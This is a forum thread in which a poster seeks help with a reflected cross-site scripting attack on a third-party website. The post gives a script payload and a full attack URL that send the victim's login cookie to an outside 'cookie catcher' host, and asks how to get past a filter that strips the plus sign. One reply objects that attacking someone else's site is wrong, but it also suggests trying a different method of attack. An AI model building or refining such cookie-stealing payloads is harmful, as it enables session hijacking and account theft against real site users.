Jump to content

Cross Site Scripting: XSS


Recommended Posts

Hi All,

I have a problem with a site that seems vulnerable to XSS!


The above will display the details of the login cookie.  However, I can’t get the following to work:

This however:


Won't work!

I’ve tried converting it to HEX etc.  Nothing seems to work.  Am I doing something wrong are there security features in modern browsers that prevent this?

When I view the HTML source however, I notice something interesting:

[tt]<script>document.location="http://www.mycookiecatcher.com/c.php?c=" document.cookie</script>[/tt]

It would appear to have filtered out the plus (+) symbol? When I type the URL:

[tt] www.site.com/help/topic.php?&topic_name=<script>document.location="www.mycookiecatcher.com?c="+document.cookie</script> [/tt]

into my browser and hit go, I get a javascript error.  It says that it says it expected a semicolon. 

I would imagine this relates to the plus symbol being filtered? I have tried to convert to HEX but I get the same problem.  Is there anything else I can do.



Link to comment
Share on other sites

its possible it filtered a number of things, but either way, you started this topic the wrong way, you said that your attacking someone else's website, this is a no no.

So simply i will say, that the site you are attacking, inst so vulnerable after all. Quite easily the web host may be filtering out "http://www.mycookiecatcher.com" in the address. This is easily done. I suggest a new method of attack.

I have a problem with a site that seems vulnerable to XSS!

There are hundreds upon thousands of sites vulnerable to an XSS attack, just gotta know how to find em, and what styles of XSS attacks you can do.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...